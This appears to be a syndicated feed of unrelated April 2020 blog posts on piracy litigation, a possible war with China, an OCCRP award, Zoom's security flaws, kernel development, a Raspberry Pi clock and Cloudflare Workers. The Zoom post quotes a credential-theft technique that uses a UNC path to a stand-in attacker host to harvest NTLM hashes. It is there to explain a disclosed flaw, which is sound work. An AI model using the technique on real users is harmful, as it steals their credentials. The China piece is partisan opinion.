RIAA Declares “Victory” in Megaupload Case Despite Not Having a Trial

Post Syndicated from Andy original https://torrentfreak.com/riaa-declares-victory-in-megaupload-case-despite-not-having-a-trial-200403/

Mention the word ‘Limewire’ to today’s file-sharers, downloaders, or streamers, and you’ll probably get a vacant stare in response. After being handed a massive defeat at the hands of the RIAA in 2010, it’s now viewed as old technology, a redundant cassette tape in a brand new hi-tech world.

But if a decade seems like a long time for a technology like Limewire, spare a thought for Megaupload. In a few months’ time, the shutdown of the site at the hands of US and New Zealand authorities (assisted by the MPAA and RIAA, of course) will be less than a year away from its own tenth anniversary.

Only a gambling man would dare to predict when or even if the multiple cases against Dotcom will ever be concluded but for chairman and RIAA CEO Mitch Glazier, none of that seems to be as crucial as it once was.

In an interview just published by Rolling Stone, Glazier recalls his time at the RIAA, covering a wide range of topics affecting the industry. In respect of copyright and piracy issues, he effectively declares victory over the German-born entrepreneur.

“We have had some huge significant victories along the way,” he told Rolling Stone.

“Going to the Supreme Court to show that music is protected online; winning that case against Kim Dotcom and the cyberlocker world to deter future Kim Dotcoms from doing the same thing.”

The statement is interesting on a number of fronts. Firstly, it’s important to note that Kim Dotcom has yet to set foot in a US court to face not only a criminal action by the US Government but also civil suits filed by Hollywood and the music industry, headed by the RIAA.

That, of course, is entirely down to the Megaupload founder. He’s been fighting tooth and nail to avoid extradition to the United States and with decades in prison on the table, who wouldn’t?

Nevertheless, a court-stamped victory in any of these procedures remains on the distant horizon. As reported last week, the cases filed by the RIAA and MPAA have been on hold for years and have just been delayed for another six months.

So, from a technical perspective at least, the RIAA hasn’t had the pleasure of “winning the case against Kim Dotcom”. However, not all victories are achieved in court. In fact, ‘gone to trial and received a verdict’ affects a tiny minority.

If the aim of the action was to destroy Megaupload, that has been achieved in no uncertain terms. Within minutes of the launch of the operation, the file-hosting site was brought to its knees and, shortly after, there was little left but a mountain of servers gathering dust. This, of course, could be the significant victory Glazier was talking about.

And there are other matters too. The deterrent effect of the Megaupload raid was considerable and in the wake of its demise, other large file-sharing sites closed down. No one really knows how many other developers changed course as a result but it wouldn’t be a surprise if ‘many’ was the answer.

Nevertheless, just a year later Dotcom launched Mega, a massive file-sharing site that is still going strong today, albeit not under his control. Given the way Mega operates, it’s unlikely it could ever be tackled in the same way as Megaupload was. In many respects, its formation was guided by the case against Megaupload, which effectively handed the platform a guidebook on how not to fall foul of the law.

As the years have ticked by since the destruction of Megaupload, the acquisition of free music hasn’t sat still. In common with many types of piracy, it continues today and presents new challenges for those seeking to mitigate its effects. While file-hosting services still provide a threat, it’s more likely these days for the RIAA to be tackling sites that help users to obtain content for free from legitimate sources like YouTube.

“Now in the stream-ripping world, we are trying to figure out from an anti-circumvention point of view how to stop somebody hacking into YouTube’s system,” Glazier explains.

This is a clear reference to so-called YouTube-ripping sites, that allow music fans to download rather than stream content. The RIAA is in a battle with these platforms using a mix of direct legal action and the sending of large volumes of DMCA anti-circumvention notices. The latter might be proving an irritant to ripping platforms but they are not being put out of business.

Interestingly, Glazier hints that the anti-circumvention notice approach, which results in URLs of stream-ripping sites being permanently delisted from Google, may have in part been prompted by issues with the RIAA’s distribution platforms, the largest of which is YouTube.

“[T]he resources required to stop [stream-ripping] create tension between us and our licensing partners, so we have to see if we can address the issue through search or some other means. The brainstorm has been ever-changing,” he reveals.

But while there are always new challenges, some things never change. Pre-release leaks are a major source of distress to the record labels and Glazier says that these “emergencies” always keep him on his toes.

“If an artist has an album coming out and it goes up on a site before that, our job is to work with the other groups around the world — 24/7, 365 days a year — to get that down so the artist can receive the benefit of the release of their product,” he says.

Leaks apparently appear in Glazier’s email marked with a “little red flag” alongside what appears to be an action plan. Given the global reach of the labels, mitigation may start off in one time zone and then shift to another, to ensure that anti-piracy personnel are on the case around the clock. And that helps to blur the lines between Glazier’s working and social life too.

“[E]very 20 minutes there will be another ping from the label: ‘Is it down yet? Is it down yet? Is it down yet?’ Because the artist is saying to the label: ‘Is it down yet? Is it down yet? Is it down yet?’,” he explains.

“It’s always emergencies at the weekend. It’s just Murphy’s Law.”

Drom: TF, for the latest news on copyright battles, torrent sites and more. We also have an annual VPN review.

The implausibility of a war with China

Post Syndicated from esr original http://esr.ibiblio.org/?p=8643

In the wake of the PRC’s actions around the COVID-19 pandemic, there has been increasing speculation in some circles that the PRC might be preparing to wage war against the United States, or at least some sort of regional war (such as an invasion of Taiwan) in which treaty obligations would involve the U.S.

I’ve actually been considering this possibility, from my perspective as a wargamer and military-history buff, for over a decade – ever since China began seriously flexing its muscles in the South China Sea. And the risk of war has undoubtedly been rising recently.

The PRC has given U.S. and other trade partners ample reason to conclude that they need to decouple their economies from Chinese supply chains. Threats by China to use its control of most of rare-earth production for economic blackmail have been followed by much more serious threats to use its dominance of the manufacturing of basic pharmaceuticals as a weapon.

Post-COVID-19, it’s now strategically vital for other nations to develop supply chains for critical goods that are domestic, or at least better guarded against the political and epidemiological risk of relying on Chinese manufacturing. While necessary, this shift does mean the PRC has less to lose in the event of going to war.

Nevertheless, I continue to judge that the odds of China launching a war are very low. Nobody can entirely rule out enraged, irrational behavior by the PRC, but in the remainder of this post I will attempt to demonstrate why the war options available to the PRC hold out little or no prospect of a satisfying victory and entail severe terminal risks.

To wage a winning war, you need to formulate a set of war aims that are achievable with the tools and resources you have. Your strategy derives from your war aims, which have to be grounded in some notion of how you will manage the peace following a military victory to your advantage.

Historically, the overwhelmingly most common sort of aggressive war is a war of conquest. In these the war aim is simple – to conquer and annex some territory, and then integrate it into your state structure following victory.

In more sophisticated versions of this game you may be satisfied with the creation of a compliant client state from your conquest.

A step further away from raw conquest is war to maintain position as the dominant power (the hegemon) of a trade network that gathers wealth for your nation even without exerting formal control of the other polities in the network. Many wars that at first sight appear to be ideologically motivated can be understood this way, with political or religious ideology providing a rationale for hegemony that the entire trade network accepts – or can at least be made to echo.

Broadly speaking, land power tend to wage wars of conquest, while maritime powers wage wars of hegemony. There have been exceptions in both directions.

In all these cases, a set of war aims needs to hold out a better than even chance that the gains of war will outweigh the costs.

To understand how limited the PRC’s war options are, we can start with a grasp on how difficult and unsatisfying any war of conquest would be due to the geographic box China is in. The obstacles around it are formidable.

To the south, the Himalayan massif makes all of South Asia other than a narrow coastal plain on the Southeast Asian peninsula inaccessible to serious troops movements. There are no roads or rail links. The last time the Chinese tried pushing in that direction, in 1979, they were unable to sustain an offensive at any distance from their railheads and withdrew after less than a month. Their war aim – forcing the North Vietnamese to withdraw its troops from Cambodia – failed.

To the west, the vastness and comparatively undeveloped state of China’a western hinterland is a serious logistical problem before one even gets to the border. At the borders, the Tien Shan and Pamir ranges present a barrier almost as formidable as the Himalayas. External road and rail links are poor and would be easily interdicted.

To the north, movement would be easier. It might be just within logistical possibility for the PLA to march into Siberia. The problem with this idea is that once you’ve conquered Siberia, what you have is…Siberia. Most of it, except for a small area in the south coastal region of Primorsky Kraye, is so cold that cities aren’t viable without food imports from outside the region. Set this against the risks of invading a nuclear-armed Russia and you don’t have a winning proposition.

To the east is the South China Sea. The brute fact constraining the PRC’s ambitions in that direction is that mass movement of troops by sea is risky and difficult. I recently did the math on Chinese sealift craft and despite an expensive buildup since the 1980s they don’t have the capacity to move even a single division-sized formation over ocean. Ain’t nobody going to take Taiwan with one division, they’ve has too much time to prepare and fortify over the last 60 years.

The PRC leadership is evil and ruthless, but it’s also cautious and historically literate and can read maps. Accordingly, the People’s Liberation Army is designed not to take territory but to hold the territory the PRC already has. Its mission is not conquest but the suppression of regional warlordism inside China itself. The capability for it to wage serious expeditionary warfare doesn’t exist, and can’t be built in the near-term future.

It’s often said that the danger of aggressive war by China is a function of the huge excess of young men produced by covert sexual selection and the one-child policy. But to expend those young men usefully you need to get them to where they can fight and are motivated by some prospect of seizing the wives unavailable for them at home. The PRC can’t do that.

The military threat from China is, therefore, a function of what it can do with its navy, its airpower, and its missiles. And what it can do with those against the U.S. is upper-bounded by the fact that the U.S. has nuclear weapons and would be certain to respond to a PRC nuclear or EMP attack on the U.S. mainland by smashing Chinese cities into radioactive rubble.

Within the constraints of conventional warfare waged by navy and air force it is difficult to imagine an achievable set of PRC war aims that gains more than it costs.

This isn’t to say the PRC couldn’t do a lot of damage if it wants to. Anybody with a brain has to worry about U.S. carriers looking like big, fat, slow targets in the modern naval battlespace. There’s intelligence that the PRC is working hard on hypersonic ship-killer missiles, and I certainly would be in their shoes. It may already be unsafe for hostile carriers to operate inside the first island chain.

The problem is this: after you’ve surprised and sunk a couple of U.S. fleet carriers, what do you do for an encore? How do you convert that tactical victory into strategic gains? You’re not going to do it with your army, which can’t get anywhere more interesting after the sinkings than it could before.

Your problems are compounded by China’s extreme import dependence. You need a constant high volume of imports of coal, oil, and steel to keep your economy running. These have to be imported through sealanes that are extremely vulnerable to interdiction, notably at the Malacca Straits and in the Persian Gulf.

In a lot of ways your strategic situation is like a scaled-up version of Japan’s in 1941 – you could seize the initiative with a Pearl-Harbor-like initial shock, but you can’t wage a long war because without sealane control you’ll run out of key feedstocks and even food rather rapidly. And unlike the Japanese in 1941, you don’t have the kind of serious blue-water navy that you’d need for sealane control outside the First Island Chain – not with just two carriers you don’t.

There is one way an aggressive naval war could work out in your favor anyway. You can count on the U.S.’s media establishment to be pulling for the U.S. to lose any war it’s in, especially against a Communist or Socialist country. If your war goals are limited to ending U.S. naval power projection in the Western Pacific, playing for a rapid morale collapse orchestrated by agents of influence in the U.S. is not completely unrealistic.

It’s playing with fire, though. One problem is that before you launch your attack you don’t know that your sucker punch will actually work. Another is that, as the Japanese found out after Pearl Harbor, the American public may react to tragic losses with Jacksonian fury. If that happens, you’re seriously screwed. The war will end with your unconditional surrender, and not sooner.

You’re probably screwed anyway. Given even minimal spine in the U.S.’s civilian leadership, the U.S. Navy can strangle your economy in a matter of months by interdicting a handful of chokepoints well outside of the area where you can sustain naval operations at a wartime tempo. Those hypersonic missiles are all very well if you actually have them, but even if you could could reach out and touch the Malacca Straits with them they’re not going to do much against attack submarines.

Again I note that the PRC leadership can read maps. It is probably more aware and less self-deluding about the economic precariousness of its situation than American politicians would be if the positions were reversed, because Marxist doctrine insists that politics is an epiphenomenon of economics.

The PRC can start a war, but they don’t have the capability to win one. That’s why, barring a Hitler-scale episode of insanity in the PRC leadership, it’s not going to happen.

OCCRP получи наградата Скол като сериозна инвестиция в мащаба на въздействие на организацията

Post Syndicated from Екип на Биволъ original https://bivol.bg/occrp-skoll-2020.html

петък 3 април 2020


От Международния журналистически проект за разследване на организираната престъпност и корупцията (OCCRP)

Международният журналистически проект за разследване на организираната престъпност и корупцията (OCCRP) получи наградата Скол (Skoll) за 2020 г. за социално предприемачество. Тази награда се предоставя на подбрана група социални предприемачи, чиито иновации вече са оказали значително и доказано въздействие върху някои от най-належащите световни проблеми и които са подготвени да увеличат значително мащаба на това въздействие. Тя предоставя 1,5 милиона долара безвъзмездна помощ за следващите три години.

Наградата Скол

„В момент, когато светът се бори с жестока глобална пандемия, за неговите е граждани е по-важно от всякога да умеят да разпознават корумпирани лидери и престъпни мрежи, които печелят на гърба на надвисналата опасност. Освен това трябва да изпреварим обхвата на възстановителните дейности след вирусната пандемия, които ще изобилстват от възможности за злоупотреби “, каза Пол Раду, съосновател и директор иновации на OCCRP. „Мрежата на OCCRP играе уникална роля в търсенето на отчетност и отговорност от овластените и ние сме изключително благодарни на Фондация Скол за признанието, което дава на силата на разследващата журналистика в такъв ключов момент.“

Наградата Скол представлява значителна инвестиция в усилията на OCCRP да развие и снабди с всичко необходимо глобална мрежа от разследващи журналисти и да осветли престъпността и корупцията, които продължават да унищожават живота, поминъка и демокрацията. OCCRP, която работи на пет континента и публикува повече от 100 трансгранични разследвания годишно, е първата медийна организация в 21-годишната история на наградата Скол, която получава това признание.

„Тъй като независимите медии продължават да бъдат обект на заплахи по цял свят, партньорството с Фондация Скол ще ни помогне да предоставим нови възможност на малки медии с нестопанска цел от мрежата на нашите членове, които в някои случаи са единствените независими гласове в техните държави“, заяви Дрю Съливан, съосновател и издател на OCCRP.

С тазгодишната награда OCCRP се присъединява към глобалната общност на Скол, начело на която стоят лидери на гражданското общество, политически лидери, дарители и разказвачи, водени от определена мисия. „За OCCRP възможността да промени света зависи от това колко хора ще достигнем с нашите разследвания. Тази инвестиция идва в много решаващ момент за организацията, но именно партньорството със Скол и с по-широката общност я превръща в неоценима възможност за максимално увеличаване на нашия обхват и въздействие “, каза Камил Айс, директор глобално партньорство и политика на OCCRP.

Пол Раду и Дрю Съливан трябваше да получат наградата Скол на Световния форум на Скол в Оксфорд, Обединеното Кралство, но поради пандемията от коронавирус събитието беше преместено във виртуален форум.

Превод Бивол

How Do Coronavirus Tests Work?

Post Syndicated from Emily Waltz original https://spectrum.ieee.org/the-human-os/biomedical/diagnostics/how-do-coronavirus-tests-work

Months into the COVID-19 pandemic, the United States has finally moved from relying entirely on a single, flawed diagnostic test to having what may soon be an onslaught of testing options available from private entities. The U.S. Food and Drug Administration over the last three weeks has authorized the emergency use of more than 20 diagnostic tests for the novel coronavirus known as SARS-CoV-2.

Those add to the hundreds of tests that researchers are developing globally. The Foundation for Innovative New Diagnostics (FIND) in Geneva, Switzerland keeps a running global list of COVID-19 tests that, as of 3 April, neared 400. 

To help our readers sort through the deluge of diagnostics, here, we provide a simple explainer on coronavirus testing.

Coronavirus Pandemic Prompts Privacy-Conscious Europe to Collect Phone Data

Post Syndicated from Jeremy Hsu original https://spectrum.ieee.org/tech-talk/telecom/security/how-coronavirus-pandemic-europe-collecting-phone-data

Amid the coronavirus pandemic, even privacy-conscious European governments have asked telecom companies for residents’ phone location data in hopes of understanding whether national social distancing measures such as stay-at-home orders and business closures are having any effect on the spread of COVID-19.

Some of the hardest-hit countries, including Italy and Spain, are now open to proposals for mobile apps that can make contact tracing more efficient and alert people who have come into contact with someone infected by the novel coronavirus.

Security and Privacy Implications of Zoom

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/security_and_pr_1.html

Over the past few weeks, Zoom’s use has exploded since it became the video conferencing platform of choice in today’s COVID-19 world. (My own university, Harvard, uses it for all of its classes.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom’s problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom’s privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by “sell.” We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace. So in our humble opinion, we don’t think most of our users would see us as selling their information, as that practice is commonly understood.

“Depends what you mean by ‘sell.'” “…most of our users would see us as selling…” “…as that practice is commonly understood.” That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who “download[ed] an app from the Marketplace” remember consenting to them giving your personal data to third parties? I don’t.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[…]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There’s lots more. It’s better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages “marketing websites,” which means it’s still using third-party trackers and surveillance based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom’s security is at best sloppy, and malicious at worst. Motherboard reported that Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

This isn’t the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user’s web camera without the user’s knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users’ Window credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings­ — such as \\attacker.example.com/C$­ — into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I’m sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom’s encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn’t. It only provides link encryption, which means everything is unencrypted on the company’s servers. From the Intercept:

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

They’re also lying about the type of encryption. On 4/3, Citizen Lab reported

Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China.

I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom’s software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren’t great, and if you don’t configure your meetings right you’re leaving yourself open to all sort of mischief.

Zoombombing” is the most visible problem. People are finding open Zoom meetings and events, joining them, and sharing their screens to broadcast offensive content — porn, mostly — to everyone. It’s awful if you’re the victim, and a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn’t make the meeting ID long enough to prevent someone from randomly trying them, looking for meetings. This isn’t new; Checkpoint Research reported this last summer. Instead of making the meeting IDs longer or more complicated — which it should have done — it enabled meeting passwords by default. Of course most of us don’t use passwords, and there are now automatic tools for finding Zoom meetings.

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don’t share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That’s what we know about Zoom’s privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it’s in the spotlight, it’s all coming out. On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let’s see if that’s anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or — better yet — abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

How to Practice Activist Engineering

Post Syndicated from Darshan M.A. Karwat original https://spectrum.ieee.org/tech-talk/at-work/tech-careers/how-to-practice-activist-engineering

This is a guest post. The views expressed here are solely those of the author and do not represent positions of IEEE Spectrum or the IEEE.

Engineering work has far-reaching implications, both designed and unintended. For example, continued engineering investments in weapons of mass destruction may not be creating a more peaceful world, and deepfake technology is changing our perceptions of truth itself.

It’s crucial for engineers to have the ability to understand and act on the implications of their work. Some reflective engineers, inspiringly, are speaking up, like those who started the Engineer’s Declare movement in response to the climate and biodiversity crises, or those at Google who successfully fought to end their company’s involvement in building artificial intelligence technology to be used in warfare. 

While certainly provocative—and for some engineers, inspiring—these stories are not the norm. The norm is probably more like the case of my friend who works for a large defense contractor. He got his PhD in aerospace engineering—just like I did—having studied computational fluid dynamics. He wanted to do engineering work that he thought was meaningful to the world. But he couldn’t find any other good job close to his partner, so he wound up in defense.  

[$] 5.7 Merge window part 1

Post Syndicated from corbet original https://lwn.net/Articles/816313/rss

As of this writing, 7,233 non-merge changesets have been pulled into the
mainline repository for the 5.7 kernel development cycle — over the course
of about three days. If current world conditions are slowing down kernel
development, it would seem that the results are not yet apparent at this
level. As usual, these changesets bring no end of fixes, improvements, and
new features; read on for a summary of what the first part of the 5.7 merge
window has brought in.

Q&A: Sourcegraph’s Universal Code Search Tool

Post Syndicated from Rina Diane Caballar original https://spectrum.ieee.org/tech-talk/computing/software/sourcegraph-universal-code-search-tool

In software development, code search is a way to better navigate and understand code. But it’s an often overlooked technique, with development tools and coding environments offering clunky and limited search functionalities.

Tech startup Sourcegraph aims to change that with its universal code search tool by the same name that makes searching code as seamless as doing a Google search on the web. To achieve that efficiency, Sourcegraph models code and its dependencies as a graph, and performs queries on the graph in real time.

Privacy in the Time of COVID-19

Post Syndicated from Mark Pesce original https://spectrum.ieee.org/telecom/security/privacy-in-the-time-of-covid19

Even though I understand how it works, I consistently find Google’s ability to know how long it will take me to drive somewhere nothing less than magical. GPS signals stream location and speed data from the legion of smartphones in vehicles on the roads between my origin and my destination; it takes only a bit of math to come up with an estimate accurate to within a few minutes.

Lately, researchers have noted that this same data can be used to pinpoint serious traffic accidents minutes before any calls get placed to emergency responders—extra time within that “golden hour” vital to the saving of lives. That result points to a hidden upside to the beast Shoshana Zuboff termed surveillance capitalism. That is, all of this data about our activities being harvested by our devices could be put to work to serve the public good.

We need that now like never before, as the entire planet confronts a pandemic. Fortunately, we’ve been exceptionally clever at making smartphones—more than 4 billion of them in every nation on earth—and they offer an unprecedented opportunity to harness their distributed sensing and intelligence to provide a greater degree of safety than we might have had without them.

Taiwan got into this game early, combining the lessons of SARS with the latest in tracking and smartphone apps to deliver an integrated public health response. As of this writing, that approach has kept the country’s infection rate among the lowest in the world. The twin heads of surveillance capitalism, Google and Facebook, will spend the next year working with public health authorities to provide insights that can guide both the behavior of individuals and public policy. That’s going to give some angina to the advocates of strong privacy policies (I count myself among them), but in an emergency, public good inevitably trumps private rights.

This relaxation of privacy boundaries mustn’t mean the imposition of a surveillance state—that would only result in decreased compliance. Instead, our devices will be doing our utmost to remind us how to stay healthy, much like our smartwatches already do but more pointedly and with access to far greater data. Both data and access are what we must be most careful with, looking for the sweet spot between public health and private interest, with an eye to how we can wind back to a world with greater privacies after the crisis abates.

A decade ago I quit using Facebook, because even then I had grave suspicions that my social graph could be weaponized and used against me. Yet this same capacity to know so much about people—their connections, their contacts, even their moods—means we also have a powerful tool to track the spread of outbreaks both of disease and deadly misinformation. While firms like Cambridge Analytica have used this power to sway the body politic, we haven’t used such implements yet for the public good. Now, I’d argue, we have little choice.

We technologists are going to need to get our hands dirty, and only with transparency, honesty, and probity can we do so safely. Yes, use the data, use the tools, use the analytics and the machine learning, bring it all to bear. But let us all know how, when, and why it’s being used. Because it appears that making a turn toward a surveillance society will protect us now—and, in particular, help our most vulnerable to stay safe—we need to be honest about our needs, transparent about our uses, and completely clear about our motives.

Bug Bounty Programs Are Being Used to Buy Silence

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/bug_bounty_prog.html

Investigative report on how commercial bug-bounty programs like HackerOne, Bugcrowd, and SynAck are being used to silence researchers:

Used properly, bug bounty platforms connect security researchers with organizations wanting extra scrutiny. In exchange for reporting a security flaw, the researcher receives payment (a bounty) as a thank you for doing the right thing. However, CSO’s investigation shows that the bug bounty platforms have turned bug reporting and disclosure on its head, what multiple expert sources, including HackerOne’s former chief policy officer, Katie Moussouris, call a “perversion.”

[…]

Silence is the commodity the market appears to be demanding, and the bug bounty platforms have pivoted to sell what willing buyers want to pay for.

“Bug bounties are best when transparent and open. The more you try to close them down and place NDAs on them, the less effective they are, the more they become about marketing rather than security,” Robert Graham of Errata Security tells CSO.

Leitschuh, the Zoom bug finder, agrees. “This is part of the problem with the bug bounty platforms as they are right now. They aren’t holding companies to a 90-day disclosure deadline,” he says. “A lot of these programs are structured on this idea of non-disclosure. What I end up feeling like is that they are trying to buy researcher silence.”

The bug bounty platforms’ NDAs prohibit even mentioning the existence of a private bug bounty. Tweeting something like “Company X has a private bounty program over at Bugcrowd” would be enough to get a hacker kicked off their platform.

The carrot for researcher silence is the money — bounties can range from a few hundred to tens of thousands of dollars — but the stick to enforce silence is “safe harbor,” an organization’s public promise not to sue or criminally prosecute a security researcher attempting to report a bug in good faith.

Instaclock | The Magpi 92

Post Syndicated from Ashley Whittaker original https://www.raspberrypi.org/blog/instaclock-the-magpi-92/

Designed to celebrate a new home, Instaclock uses two Raspberry Pi computers to great visual effect. Rosie Hattersley introduces maker Riccardo Cereser’s eyecatching build in issue #92 of The MagPi, out now.

There is nothing like a deadline to focus the mind! Copenhagen-based illustrator and UX designer Riccardo Cereser was about to move into a new apartment with his girlfriend, and was determined his new home would have a unique timepiece. Instaclock is the result.

Having studied at the Copenhagen Institute of Interactive Design, Italian-born Riccardo was keen that his new apartment would include an object that reflected his skills. He began sketching out ideas in Photoshop, starting with the idea of images representing numbers. “A hand showing fingers; a bicycle wheel resembling the number 0; candles on a cake; or the countdown numbers that appear in the beginning of a recording…” he suggests.

Having decided the idea could be used for an interactive clock, he quickly worked out how such an image-based concept might work displaying the hour, minutes, and seconds on displays in three wooden boxes.

Next, he set off around Copenhagen. “I started taking photos of anything that could resemble a number, aiming to create sets of ten pictures each based on a specific theme,” he recalls. “I then thought how awesome it would be to be able to switch the theme and create new sets on the go, potentially by using Instagram.”

This, Riccardo explains, is how the project became known as Instaclock. He was able to visualise his plan using Photoshop and made a prototype for his idea. It was clear that there was no need to display seconds, for example. Minute-by-minute updates would be fine.

Getting animated

Next up was figuring out how to call up and refresh the images displayed. Riccardo had some experience of using Raspberry Pi, and had even made a RetroPie games console. He also had a friend on the interactive design course who might just be able to help

Creative coder Andreas Refsgaard soon got involved, and was quickly able to come up with a Processing sketch for Instaclock.

Having spent dozens of hours looking into how an API might be used to pull in specific images for his clock, Riccardo was grateful that Andreas immediately grasped how it could be done. Riccardo then set parameters in cron for each Raspberry Pi used, so the Instaclock loaded images at startup and moved on to the next image set every ten seconds.

Because Riccardo wanted Instaclock to be as user-friendly as possible, they also added a rule that shuts a screen down if the button on top of it is pressed for ten seconds or more. The script was one he got from The MagPi.

Assembly time

One of the most fun aspects of this project was the opportunity to photograph, draw, or source online images that represent numerals. It was also the most time-consuming, of course. Images reside in Dropbox folders, so can be accessed from anywhere. Deciding on a suitable set of screens to display them, and boxes or frames for them, could also have dragged on but for an impromptu visit to Ikea. Riccardo fortuitously found that the Waveshare screens he selected would fit neatly into the store’s Dragan file organiser boxes. He was then able to laser-cut protective overlays secured with tiny magnets.

Read The MagPi for free!

Find more fantastic projects, tutorials, and reviews in The MagPi #92, out now! You can get The MagPi #92 online at our store, or in print from all good newsagents and supermarkets. You can also access The MagPi magazine via our Android and iOS apps.

Don’t forget our super subscription offers, which include a free gift of a Raspberry Pi Zero W when you subscribe for twelve months.

And, as with all our Raspberry Pi Press publications, you can download the free PDF from our website.

The post Instaclock | The Magpi 92 appeared first on Raspberry Pi.

Trailblazing a Development Environment for Workers

Post Syndicated from Avery Harnish original https://blog.cloudflare.com/trailblazing-a-development-environment-for-workers/

Trailblazing a Development Environment for Workers

Trailblazing a Development Environment for Workers

When I arrived at Cloudflare for an internship in the summer of 2018, I was taken on a tour, introduced to my mentor who took me out for coffee (shoutout to Preston), and given a quick whiteboard overview of how Cloudflare works. Each of the interns would work on a small project of their own and they’d try to finish them by the end of the summer. The description of the project I was given on my very first day read something along the lines of “implementing signed exchanges in a Cloudflare Worker to fix the AMP URL attribution problem,” which was a lot to take in at once. I asked so many questions those first couple of weeks. What are signed exchanges? Can I put these stickers on my laptop? What’s a Cloudflare Worker? Is there a limit to how much Topo Chico I can take from the fridge? What’s the AMP URL attribution problem? Where’s the bathroom?

I got the answers to all of those questions (and more!) and eventually landed a full-time job at Cloudflare. Here’s the story of my internship and working on the Workers Developer Experience team at Cloudflare.

Getting Started with Workers in 2018

After doing a lot of reading, and asking a lot more questions, it was time to start coding. I set up a Cloudflare account with a Workers subscription, and was greeted with a page that looked something like this:

Trailblazing a Development Environment for Workers

I was able to change the code in the text area on the left, click “Update”, and the changes would be reflected on the right — fairly self-explanatory. There was also a testing tab which allowed me to handcraft HTTP requests with different methods and custom headers. So far so good.

